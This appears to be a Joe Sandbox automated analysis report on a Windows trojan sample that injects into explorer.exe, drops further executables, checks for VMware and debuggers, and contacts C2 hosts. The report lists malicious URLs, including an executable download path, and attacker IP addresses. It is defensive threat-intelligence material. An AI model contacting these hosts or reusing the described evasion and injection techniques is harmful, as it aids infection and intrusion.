          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: PC:\wekeledo-cilebac.pdb0_ source: file.exe, cgjtubb.4.dr
          Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 2B26.exe, 0000000A.00000002.473602771.0000000000410000.00000040.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000002.494160010.0000000000410000.00000040.00000001.01000000.0000000A.sdmp
          Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 2B26.exe, 0000000F.00000002.495056481.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.501354011.0000000002A88000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\tipalowi\48\cibo\rorijagumew\veh\jixanuwud42_goku.pdb source: 2B26.exe, 0000000A.00000000.460526248.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000000.473105275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe.4.dr
          Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 2B26.exe, 0000000F.00000002.495056481.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.501354011.0000000002A88000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\hicimusafaye.pdb source: FD31.exe, 00000008.00000000.428535544.0000000000401000.00000020.00000001.01000000.00000008.sdmp, FD31.exe.4.dr
          Source: Binary string: C:\wekeledo-cilebac.pdb source: file.exe, cgjtubb.4.dr
          Source: Binary string: TC:\hicimusafaye.pdb0_ source: FD31.exe, 00000008.00000000.428535544.0000000000401000.00000020.00000001.01000000.00000008.sdmp, FD31.exe.4.dr
          Source: Binary string: C:\tipalowi\48\cibo\rorijagumew\veh\jixanuwud42_goku.pdb0_ source: 2B26.exe, 0000000A.00000000.460526248.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000000.473105275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe.4.dr

          Data Obfuscation

          Source: C:\Users\user\AppData\Local\Temp\FD31.exeUnpacked PE file: 8.2.FD31.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 10.2.2B26.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 15.2.2B26.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Roaming\cgjtubbUnpacked PE file: 5.2.cgjtubb.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeUnpacked PE file: 8.2.FD31.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 10.2.2B26.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 15.2.2B26.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\user\AppData\Roaming\cgjtubbUnpacked PE file: 17.2.cgjtubb.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402F47 push eax; ret 1_2_00402F82
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402F7D push eax; ret 1_2_00402F82
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402183 push ecx; iretd 1_2_004024FA
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0071540B push 75A06D18h; ret 1_2_0071541A
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007153FB push 75A06D18h; ret 1_2_0071541A
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007163FD push eax; ret 1_2_00716402
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00715BAA push ecx; iretd 1_2_00715BB4
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00402F47 push eax; ret 5_2_00402F82
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00402F7D push eax; ret 5_2_00402F82
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00402183 push ecx; iretd 5_2_004024FA
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_005040BC push 004D27D6h; ret 8_2_0050438C
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B1464 push 004650DCh; ret 8_2_004B1655
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004E2862 push 0046776Dh; ret 8_2_004E28FB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00503978 push 004B2172h; ret 8_2_00503CA0
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B298D push 004ADFCCh; ret 8_2_004B2C1D
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00469A47 push 00467687h; ret 8_2_00469AF1
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C4B8D push dword ptr [005093A7h]; ret 8_2_004C4BAF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0046DEF0 push 00464E9Eh; ret 8_2_0046DFAB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00469F68 push 00464241h; ret 8_2_0046A0A1
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00502051 push 004B85ABh; ret 8_2_00502198
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004DD04E push 004B534Eh; ret 8_2_004DD1EC
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048204C push 0046776Dh; ret 8_2_004821F2
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004FE04B push 004ED4E2h; ret 8_2_004FE065
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004CE047 push 004668D8h; ret 8_2_004CE082
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D3042 push 004BE12Ch; ret 8_2_004D310E
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0050405F push 004BECDFh; ret 8_2_005040BB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D605F push 004C1383h; ret 8_2_004D61CF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D605F push 004ACE34h; ret 8_2_004DAC74
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EC055 push 004BB3D7h; ret 8_2_004EC0B4
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C9028 push 004BB3D7h; ret 8_2_004C91CD
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00470064 push 0046426Ah; ret 8_2_00470399
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cgjtubb
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FD31.exe
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2B26.exe
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeFile created: C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exe
          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\cgjtubb:Zone.Identifier read attributes | delete
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: file.exe, 00000001.00000002.378045124.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\AppData\Roaming\cgjtubbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Windows\explorer.exe TID: 5812Thread sleep count: 665 > 30
          Source: C:\Windows\explorer.exe TID: 5804Thread sleep count: 967 > 30
          Source: C:\Windows\explorer.exe TID: 5804Thread sleep time: -96700s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5808Thread sleep count: 1080 > 30
          Source: C:\Windows\explorer.exe TID: 5808Thread sleep time: -108000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1180Thread sleep count: 576 > 30
          Source: C:\Windows\explorer.exe TID: 3676Thread sleep count: 928 > 30
          Source: C:\Windows\explorer.exe TID: 3676Thread sleep time: -92800s >= -30000s
          Source: C:\Windows\explorer.exe TID: 964Thread sleep count: 897 > 30
          Source: C:\Windows\explorer.exe TID: 964Thread sleep time: -89700s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3832Thread sleep count: 461 > 30
          Source: C:\Windows\explorer.exe TID: 3092Thread sleep count: 496 > 30
          Source: C:\Windows\explorer.exe TID: 3092Thread sleep time: -49600s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\2B26.exe TID: 1900Thread sleep time: -600000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeThread delayed: delay time: 600000
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 665
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 967
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1080
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 576
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 928
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 897
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 461
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 496
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeFile opened: PHYSICALDRIVE0
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeAPI coverage: 8.4 %
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 136000
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
          Source: explorer.exe, 00000004.00000000.328230756.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
          Source: explorer.exe, 00000004.00000000.351077876.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.369699958.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
          Source: explorer.exe, 00000004.00000000.329519607.0000000008494000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}asses\Drive\shellex\FolderEBj!
          Source: explorer.exe, 00000004.00000000.328518431.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.332169863.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000004.00000000.329519607.0000000008494000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000004.00000000.351077876.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
          Source: 2B26.exe, 0000000F.00000002.502661797.0000000002B8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8

          Anti Debugging

          Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformation
          Source: C:\Users\user\AppData\Roaming\cgjtubbSystem information queried: CodeIntegrityInformation
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006D092B mov eax, dword ptr fs:[00000030h]1_2_006D092B
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006D0D90 mov eax, dword ptr fs:[00000030h]1_2_006D0D90
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00713A24 push dword ptr fs:[00000030h]1_2_00713A24
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_0047092B mov eax, dword ptr fs:[00000030h]5_2_0047092B
          Source: C:\Users\user\AppData\Roaming\cgjtubbCode function: 5_2_00470D90 mov eax, dword ptr fs:[00000030h]5_2_00470D90
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\cgjtubbProcess queried: DebugPort

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exeFile created: cgjtubb.4.dr
          Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
          Source: C:\Windows\explorer.exeDomain query: freeshmex.at
          Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80
          Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
          Source: C:\Users\user\AppData\Roaming\cgjtubbSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Users\user\AppData\Roaming\cgjtubbSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
          Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 46419C8
          Source: C:\Users\user\AppData\Roaming\cgjtubbThread created: unknown EIP: 4A619C8
          Source: C:\Users\user\AppData\Roaming\cgjtubbThread created: unknown EIP: 4C019C8
          Source: explorer.exe, 00000004.00000000.362861144.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309203167.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341795031.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000000.351122306.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.313794243.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.362861144.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.362861144.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309203167.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341795031.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.341315298.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.360283747.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.308981891.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.362861144.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309203167.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341795031.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B602D GetLocalTime,8_2_004B602D

          Stealing of Sensitive Information

          Source: Yara matchFile source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara matchFile source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.580870486.0000000000500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.431205503.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.378341751.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.431016590.0000000000480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.377969470.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: 1 Exploitation for Client Execution; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
          Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Privilege Escalation: 32 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Defense Evasion: 11 Masquerading; 141 Virtualization/Sandbox Evasion; 32 Process Injection; 1 Hidden Files and Directories; 1 Obfuscated Files or Information; 1 Rundll32; 21 Software Packing; 1 DLL Side-Loading; 1 File Deletion
          Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: 1 System Time Discovery; 1 Query Registry; 421 Security Software Discovery; 141 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 14 System Information Discovery; Network Service Scanning; System Network Connections Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
          Collection: 1 Input Capture; 11 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Command and Control: 21 Encrypted Channel; 12 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 124 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: 1 Data Encrypted for Impact; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
          [Behavior graph: ID 750406, Sample: file.exe, Startdate: 20/11/2022, Architecture: WINDOWS, Score: 100. Process chain shown: file.exe injects into explorer.exe; explorer.exe drops C:\Users\user\AppData\Roaming\cgjtubb, C:\Users\user\AppData\Local\Temp\FD31.exe and C:\Users\user\AppData\Local\Temp\2B26.exe and starts FD31.exe and 2B26.exe; FD31.exe drops Wuwedteata.tmp and starts rundll32.exe.]

          Source | Detection | Scanner | Label
          file.exe | 100% | Joe Sandbox ML

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\FD31.exe | 100% | Joe Sandbox ML
          C:\Users\user\AppData\Roaming\cgjtubb | 100% | Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\2B26.exe | 100% | Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp | 25% | ReversingLabs | Win32.Trojan.Lazy

          Source | Detection | Scanner | Label
          15.2.2B26.exe.2a8e12c.2.unpack | 100% | Avira | TR/Patched.Ren.Gen7
          5.2.cgjtubb.470e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          17.3.cgjtubb.500000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.3.file.exe.6e0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.2.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          5.2.cgjtubb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          5.3.cgjtubb.480000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          15.2.2B26.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          17.2.cgjtubb.4f0e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          8.2.FD31.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2
          17.2.cgjtubb.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          8.2.FD31.exe.2310e67.1.unpack | 100% | Avira | HEUR/AGEN.1215478
          8.3.FD31.exe.2440000.0.unpack | 100% | Avira | HEUR/AGEN.1215478
          1.2.file.exe.6d0e67.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          10.2.2B26.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          No Antivirus matches

          Source | Detection | Scanner | Label
          http://piratia.su/tmp/ | 100% | URL Reputation | malware
          https://thepokeway.nl/upload/index.php | 0% | URL Reputation | safe
          http://cracker.biz/tmp/ | 0% | URL Reputation | safe
          http://freeshmex.at/tmp/ | 0% | URL Reputation | safe
          http://123.253.32.170/root2.exe | 100% | Avira URL Cloud | malware

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          thepokeway.nl | 5.135.247.111 | true | true | | unknown
          freeshmex.at | 41.41.255.235 | true | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://piratia.su/tmp/ | true | URL Reputation: malware | unknown
          https://thepokeway.nl/upload/index.php | false | URL Reputation: safe | unknown
          http://cracker.biz/tmp/ | true | URL Reputation: safe | unknown
          http://freeshmex.at/tmp/ | false | URL Reputation: safe | unknown
          http://123.253.32.170/root2.exe | true | Avira URL Cloud: malware | unknown
          http://piratia-life.ru/tmp/ | false | | high

          IP | Domain | Country | ASN | ASN Name | Malicious
          190.147.188.50 | unknown | Colombia | 10620 | TelmexColombiaSACO | true
          41.41.255.235 | freeshmex.at | Egypt | 8452 | TE-ASTE-ASEG | true
          5.135.247.111 | thepokeway.nl | France | 16276 | OVHFR | true
          123.253.32.170 | unknown | Malaysia | 9924 | TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi | true
          138.36.3.134 | unknown | Brazil | 264562 | TEXNETSERVICOSDECOMUNICACAOEMINFORMATICALTDBR | true
          210.182.29.70 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
          190.140.74.43 | unknown | Panama | 18809 | CableOndaPA | true
          222.236.49.123 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
          175.119.10.231 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true

                IP
                192.168.2.1
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:750406
                Start date and time:2022-11-20 23:27:14 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 12m 21s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:19
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:2
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.expl.evad.winEXE@10/5@35/10
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 78.2% (good quality ratio 62.8%)
                • Quality average: 44.7%
                • Quality standard deviation: 29.5%
                HCA Information:
                • Successful, ratio: 94%
                • Number of executed functions: 30
                • Number of non-executed functions: 93
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240s for rundll32
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                • Not all processes were analyzed, report is missing behavior information
